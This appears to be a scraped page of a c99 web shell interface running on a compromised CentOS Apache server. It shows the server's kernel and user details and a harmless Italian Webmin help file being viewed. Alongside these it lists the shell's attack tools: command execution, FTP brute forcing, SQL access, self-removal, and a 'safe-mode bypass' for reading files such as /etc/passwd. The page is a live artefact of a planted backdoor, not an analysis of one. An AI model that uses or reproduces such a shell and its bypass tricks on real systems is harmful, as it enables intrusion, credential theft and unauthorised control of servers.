!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/mysql/help/   drwxr-xr-x
Free 48.09 GB of 127.8 GB (37.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user.it.html (891 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Per ciascun utente sono disponibili i seguenti parametri:
Nome utente
In questo campo è possibile inserire uno specifico nome utento o scegliere l'opzione Utente anonimo. In questo caso i permessi saranno applicati a qualunque utente che non si trova nella lista Permessi all'utente.

Password
La password richiesta per questo utente in fase di connessione.. Se viene scelta l'opzione Nessuna, non sarà richiesta alcuna password per l'accesso.

Host
Gli indirizzi IP o i nomi degli host che l'utente può utilizzare per connettersi. Questo campi può anche contenere un'espressione regolare SQL alla quale corrispondono più host, come 192.168.1.% o %.foo.com.

Permessi
Le operazioni MySQL che questo utente può eseguire su qualunque database.


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0105 ]--